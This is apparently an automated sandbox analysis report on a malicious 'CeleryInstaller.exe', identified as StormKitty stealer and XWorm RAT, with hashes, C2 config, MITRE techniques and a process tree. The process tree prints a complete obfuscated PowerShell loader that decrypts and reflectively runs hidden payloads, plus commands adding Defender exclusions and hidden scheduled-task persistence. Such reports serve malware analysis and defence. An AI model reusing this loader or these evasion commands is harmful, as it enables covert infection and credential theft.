stormkitty | a906de7e59caa3642f04482c23be09a43b17d4c90c3f2d2459dec6f9231e0785

Analysis

max time kernel
82s
max time network
95s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
15-08-2024 05:07

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

CeleryInstaller.exe
Size

822KB
MD5

5ce16788ba0245d5e0525600bc840303
SHA1

7a05b8b1f7d3e4a1ed2970ee264f8e30f7583fad
SHA256

a906de7e59caa3642f04482c23be09a43b17d4c90c3f2d2459dec6f9231e0785
SHA512

52154622f238f269ffc9dd129ba92741fc295db2cf0d11ccdbd022d05a6bbf3ddf4034897bc6223d837d9f9c9db2307165919d5a1f5cbf3d9f9d00daa4c123c6
SSDEEP

24576:6Zxdyl5wgQxPjs8kKMpoim6Gat+R3plhxZiXQu0Z:0Ul5wgQ9s8EpIa2xZn

Score

10^/10

stormkitty xworm credential_access discovery execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

bE1HzVhYuINX4Uqh

Attributes

Install_directory
%LocalAppData%
install_file
Windows Host Proccess.exe
pastebin_url
https://pastebin.com/raw/fqZCUyFU

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/4908-78-0x0000000007A30000-0x0000000007A4A000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/4908-205-0x000000000D290000-0x000000000D3AE000-memory.dmp	family_stormkitty

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 5 IoCs

flow	pid	Process
27	4908	powershell.exe
41	4908	powershell.exe
54	4908	powershell.exe
65	4908	powershell.exe
75	4908	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4528	powershell.exe
4052	powershell.exe
4908	powershell.exe
4200	powershell.exe
3372	powershell.exe
2216	powershell.exe
4864	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	CeleryInstaller.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Host Proccess.lnk	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
4980	CeleryInstaller.exe
996	Windows Host Proccess

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Host Proccess = "C:\\Users\\Admin\\AppData\\Local\\Windows Host Proccess"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
41	pastebin.com
35	raw.githubusercontent.com
36	raw.githubusercontent.com
40	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3728	4908	WerFault.exe	106

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Host Proccess
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CeleryInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CeleryInstaller.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2304	schtasks.exe

Suspicious behavior: EnumeratesProcesses 23 IoCs

pid	Process
4528	powershell.exe
4528	powershell.exe
4052	powershell.exe
4052	powershell.exe
4908	powershell.exe
4908	powershell.exe
4908	powershell.exe
3372	powershell.exe
3372	powershell.exe
3372	powershell.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe
4864	powershell.exe
4864	powershell.exe
4864	powershell.exe
4200	powershell.exe
4200	powershell.exe
4200	powershell.exe
4908	powershell.exe
996	Windows Host Proccess
996	Windows Host Proccess
996	Windows Host Proccess

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	powershell.exe
Token: SeSecurityPrivilege	4052	powershell.exe
Token: SeTakeOwnershipPrivilege	4052	powershell.exe
Token: SeLoadDriverPrivilege	4052	powershell.exe
Token: SeSystemProfilePrivilege	4052	powershell.exe
Token: SeSystemtimePrivilege	4052	powershell.exe
Token: SeProfSingleProcessPrivilege	4052	powershell.exe
Token: SeIncBasePriorityPrivilege	4052	powershell.exe
Token: SeCreatePagefilePrivilege	4052	powershell.exe
Token: SeBackupPrivilege	4052	powershell.exe
Token: SeRestorePrivilege	4052	powershell.exe
Token: SeShutdownPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeSystemEnvironmentPrivilege	4052	powershell.exe
Token: SeRemoteShutdownPrivilege	4052	powershell.exe
Token: SeUndockPrivilege	4052	powershell.exe
Token: SeManageVolumePrivilege	4052	powershell.exe
Token: 33	4052	powershell.exe
Token: 34	4052	powershell.exe
Token: 35	4052	powershell.exe
Token: 36	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	powershell.exe
Token: SeSecurityPrivilege	4052	powershell.exe
Token: SeTakeOwnershipPrivilege	4052	powershell.exe
Token: SeLoadDriverPrivilege	4052	powershell.exe
Token: SeSystemProfilePrivilege	4052	powershell.exe
Token: SeSystemtimePrivilege	4052	powershell.exe
Token: SeProfSingleProcessPrivilege	4052	powershell.exe
Token: SeIncBasePriorityPrivilege	4052	powershell.exe
Token: SeCreatePagefilePrivilege	4052	powershell.exe
Token: SeBackupPrivilege	4052	powershell.exe
Token: SeRestorePrivilege	4052	powershell.exe
Token: SeShutdownPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeSystemEnvironmentPrivilege	4052	powershell.exe
Token: SeRemoteShutdownPrivilege	4052	powershell.exe
Token: SeUndockPrivilege	4052	powershell.exe
Token: SeManageVolumePrivilege	4052	powershell.exe
Token: 33	4052	powershell.exe
Token: 34	4052	powershell.exe
Token: 35	4052	powershell.exe
Token: 36	4052	powershell.exe
Token: SeIncreaseQuotaPrivilege	4052	powershell.exe
Token: SeSecurityPrivilege	4052	powershell.exe
Token: SeTakeOwnershipPrivilege	4052	powershell.exe
Token: SeLoadDriverPrivilege	4052	powershell.exe
Token: SeSystemProfilePrivilege	4052	powershell.exe
Token: SeSystemtimePrivilege	4052	powershell.exe
Token: SeProfSingleProcessPrivilege	4052	powershell.exe
Token: SeIncBasePriorityPrivilege	4052	powershell.exe
Token: SeCreatePagefilePrivilege	4052	powershell.exe
Token: SeBackupPrivilege	4052	powershell.exe
Token: SeRestorePrivilege	4052	powershell.exe
Token: SeShutdownPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeSystemEnvironmentPrivilege	4052	powershell.exe
Token: SeRemoteShutdownPrivilege	4052	powershell.exe
Token: SeUndockPrivilege	4052	powershell.exe
Token: SeManageVolumePrivilege	4052	powershell.exe
Token: 33	4052	powershell.exe
Token: 34	4052	powershell.exe
Token: 35	4052	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4908	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 1924 wrote to memory of 3252	1924	CeleryInstaller.exe	84
PID 1924 wrote to memory of 3252	1924	CeleryInstaller.exe	84
PID 1924 wrote to memory of 3252	1924	CeleryInstaller.exe	84
PID 3252 wrote to memory of 4692	3252	cmd.exe	86
PID 3252 wrote to memory of 4692	3252	cmd.exe	86
PID 3252 wrote to memory of 4692	3252	cmd.exe	86
PID 4692 wrote to memory of 2896	4692	net.exe	87
PID 4692 wrote to memory of 2896	4692	net.exe	87
PID 4692 wrote to memory of 2896	4692	net.exe	87
PID 3252 wrote to memory of 4528	3252	cmd.exe	92
PID 3252 wrote to memory of 4528	3252	cmd.exe	92
PID 3252 wrote to memory of 4528	3252	cmd.exe	92
PID 4528 wrote to memory of 4052	4528	powershell.exe	95
PID 4528 wrote to memory of 4052	4528	powershell.exe	95
PID 4528 wrote to memory of 4052	4528	powershell.exe	95
PID 4528 wrote to memory of 3364	4528	powershell.exe	101
PID 4528 wrote to memory of 3364	4528	powershell.exe	101
PID 4528 wrote to memory of 3364	4528	powershell.exe	101
PID 3364 wrote to memory of 1900	3364	WScript.exe	102
PID 3364 wrote to memory of 1900	3364	WScript.exe	102
PID 3364 wrote to memory of 1900	3364	WScript.exe	102
PID 1900 wrote to memory of 2512	1900	cmd.exe	104
PID 1900 wrote to memory of 2512	1900	cmd.exe	104
PID 1900 wrote to memory of 2512	1900	cmd.exe	104
PID 2512 wrote to memory of 1300	2512	net.exe	105
PID 2512 wrote to memory of 1300	2512	net.exe	105
PID 2512 wrote to memory of 1300	2512	net.exe	105
PID 1900 wrote to memory of 4908	1900	cmd.exe	106
PID 1900 wrote to memory of 4908	1900	cmd.exe	106
PID 1900 wrote to memory of 4908	1900	cmd.exe	106
PID 4908 wrote to memory of 4980	4908	powershell.exe	108
PID 4908 wrote to memory of 4980	4908	powershell.exe	108
PID 4908 wrote to memory of 4980	4908	powershell.exe	108
PID 4908 wrote to memory of 3372	4908	powershell.exe	110
PID 4908 wrote to memory of 3372	4908	powershell.exe	110
PID 4908 wrote to memory of 3372	4908	powershell.exe	110
PID 4908 wrote to memory of 2216	4908	powershell.exe	112
PID 4908 wrote to memory of 2216	4908	powershell.exe	112
PID 4908 wrote to memory of 2216	4908	powershell.exe	112
PID 4908 wrote to memory of 4864	4908	powershell.exe	114
PID 4908 wrote to memory of 4864	4908	powershell.exe	114
PID 4908 wrote to memory of 4864	4908	powershell.exe	114
PID 4908 wrote to memory of 4200	4908	powershell.exe	116
PID 4908 wrote to memory of 4200	4908	powershell.exe	116
PID 4908 wrote to memory of 4200	4908	powershell.exe	116
PID 4908 wrote to memory of 2304	4908	powershell.exe	118
PID 4908 wrote to memory of 2304	4908	powershell.exe	118
PID 4908 wrote to memory of 2304	4908	powershell.exe	118

C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3252
- - C:\Windows\SysWOW64\net.exe
    net file
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4692
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      System Location Discovery: System Language Discovery
      PID:2896
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BBslLiALGpYFLEu1i/t4EBzRvVQklwJA4brDSg26+E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XK73PY4tKxp3jI+QruoY7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zhYIm=New-Object System.IO.MemoryStream(,$param_var); $JciOP=New-Object System.IO.MemoryStream; $ckzIi=New-Object System.IO.Compression.GZipStream($zhYIm, [IO.Compression.CompressionMode]::Decompress); $ckzIi.CopyTo($JciOP); $ckzIi.Dispose(); $zhYIm.Dispose(); $JciOP.Dispose(); $JciOP.ToArray();}function execute_function($param_var,$param2_var){ $epssR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qFpYd=$epssR.EntryPoint; $qFpYd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat';$bcFAm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat').Split([Environment]::NewLine);foreach ($qaSEs in $bcFAm) { if ($qaSEs.StartsWith(':: ')) { $BXfPO=$qaSEs.Substring(3); break; }}$payloads_var=[string[]]$BXfPO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_464_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_464.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4052
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_464.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3364
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_464.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1900
      - C:\Windows\SysWOW64\net.exe
        
        net file
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2512
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1300
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0BBslLiALGpYFLEu1i/t4EBzRvVQklwJA4brDSg26+E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XK73PY4tKxp3jI+QruoY7w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zhYIm=New-Object System.IO.MemoryStream(,$param_var); $JciOP=New-Object System.IO.MemoryStream; $ckzIi=New-Object System.IO.Compression.GZipStream($zhYIm, [IO.Compression.CompressionMode]::Decompress); $ckzIi.CopyTo($JciOP); $ckzIi.Dispose(); $zhYIm.Dispose(); $JciOP.Dispose(); $JciOP.ToArray();}function execute_function($param_var,$param2_var){ $epssR=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qFpYd=$epssR.EntryPoint; $qFpYd.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_464.bat';$bcFAm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_464.bat').Split([Environment]::NewLine);foreach ($qaSEs in $bcFAm) { if ($qaSEs.StartsWith(':: ')) { $BXfPO=$qaSEs.Substring(3); break; }}$payloads_var=[string[]]$BXfPO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:4908
        
        C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3372
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Host Proccess'
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4200
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Host Proccess" /tr "C:\Users\Admin\AppData\Local\Windows Host Proccess"
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2304
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 3868
        7⤵
        Program crash
        
        PID:3728

C:\Users\Admin\AppData\Local\Windows Host Proccess
"C:\Users\Admin\AppData\Local\Windows Host Proccess"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4908 -ip 4908
1⤵
PID:4064

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
9751fcb3d8dc82d33d50eebe53abe314

SHA1
7a680212700a5d9f3ca67c81e0e243834387c20c

SHA256
ad2e3139aa438f799c4a876ca3e64af772b8a5786149925a08389723e42394d7

SHA512
54907cc18684ff892b737496183ca60c788d8f5d76365586954f269dbd50ac1b9cd48c7c50bd6ca02009e6020fd77a8282c9a7ad6b824a20585c505bd7e13709

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d46ed9d23b365762b63d8dff82d06149

SHA1
2bbe313756299e4c8140063f41ebaed1580429c2

SHA256
8ef2981d5678d32b24eaa51af86390e3f05b5eec216a52aa35a313648cf751cd

SHA512
01449143e4c0f41f321413678c9ccc88fe6469e128e478a2e9d9243d19b76b449d9805c65e3443f0b9c198fc90860ebc0ff691e458e7233e80a420849c56c569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
78f645d82deb11eefd25d4acc4703b25

SHA1
80576aee3d959a4cc270c9c36c616afa00c02994

SHA256
da123200da9842bc53fb6b237b776aca455f25f673af2b1189216c30243429b5

SHA512
692782caa62ffa2bb04c520b66f663cec251c1fd3ec508ba4a4380912178370d6fb38f936b0593b87c2b1e5e9386d4276183a81c996b3e13a4884026c9d154a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ef2639225df57a8bc60c5fdb96109eec

SHA1
758726ae6db08af8ac0c41861962473b62acf9c2

SHA256
4e1ee61b78d0458594a5c55bb88cf93cfd9c3ffc6af8f00351f9831241964334

SHA512
75a8ff5fab5b5e021af553776ade7a387dd2fa95a8d5dd0ca1f2032f11c6ee62d255bcc350f1074e93b9e228c64c5bb6be4b72460fa2665b68d5fa416331c7b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6078351b5a77d809d3d71d2d2bdccb8f

SHA1
e4be0ac6fb5a7440a876b97b161b5a4330a0a23a

SHA256
7bdbaf4a5df006addf8c38a222b4bfe084855942ff73b38cd884bafaf06166b1

SHA512
db8365894263d4c64ddf0dd52a4b761da9574d9203640c12a625341d42d164494f8d6ba73b47499a976ae618a603f86a0146c3303e1b8f26683d1512ceb222af

Download Submit
C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.bat

Filesize
753KB

MD5
b330aaa77de23287e51d97ebcf4d99db

SHA1
6e419af7daa1f0b3a16cc539a12914015f46da83

SHA256
728be178f57a96a300b310b4cdbad650e9a4ce93834e2cbe8878c21d38589a9c

SHA512
2d0e0f8949a39e9a03892cbc14698f68e264e85dd66f5d3f682c26c0cbbea4821a6ab88c487fa67c54f9a9ff47af5f7a7bce0197f2957349564680b9af783df5

Download Submit
C:\Users\Admin\AppData\Local\Temp\CeleryInstaller.exe

Filesize
822KB

MD5
0bd82e264be214414d6dd26bac3e1770

SHA1
5325e64053dcf599a9c5cedec532418716f9d357

SHA256
60593ced1e78fd4b3fdffcd58bcde989d8e9b031b3ad9132815fdf614e0449d4

SHA512
842a80fed2286d06987cd2dde7ae94fc6c7986eb49cc62684f62f148973e5080df7866e1d2f81d53cb5ac95ef9d88489f6765265e29104be0ae349c6a3164592

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jzxb3ysx.vbo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Windows Host Proccess

Filesize
423KB

MD5
c32ca4acfcc635ec1ea6ed8a34df5fac

SHA1
f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

SHA256
73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

SHA512
6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_464.vbs

Filesize
115B

MD5
17aecbb7dd88bb36b9186abc8d99ad47

SHA1
726fb376a25ce68add198f782b31fe2083dab945

SHA256
ee9d24bf61eec5ba072e09ea107bccc5ebda1c894ae83842576c67ef1f5c4c30

SHA512
e7ca9964bc7cba10e28f8bf80846b58b019d17a1bd444dc2b20bbba5bace6c017bdc1b2da4af961ddd1a8f17fd74c748af4f8a5c975f4db59fad0ab1fe3cabe5

Download Submit
memory/2216-130-0x00000000705F0000-0x000000007063C000-memory.dmp

Filesize
304KB

Download
memory/3372-114-0x0000000007890000-0x00000000078A1000-memory.dmp

Filesize
68KB

Download
memory/3372-115-0x00000000078C0000-0x00000000078CE000-memory.dmp

Filesize
56KB

Download
memory/3372-113-0x0000000007550000-0x00000000075F3000-memory.dmp

Filesize
652KB

Download
memory/3372-116-0x00000000078D0000-0x00000000078E4000-memory.dmp

Filesize
80KB

Download
memory/3372-103-0x00000000705F0000-0x000000007063C000-memory.dmp

Filesize
304KB

Download
memory/3372-117-0x0000000007910000-0x000000000792A000-memory.dmp

Filesize
104KB

Download
memory/3372-118-0x0000000007900000-0x0000000007908000-memory.dmp

Filesize
32KB

Download
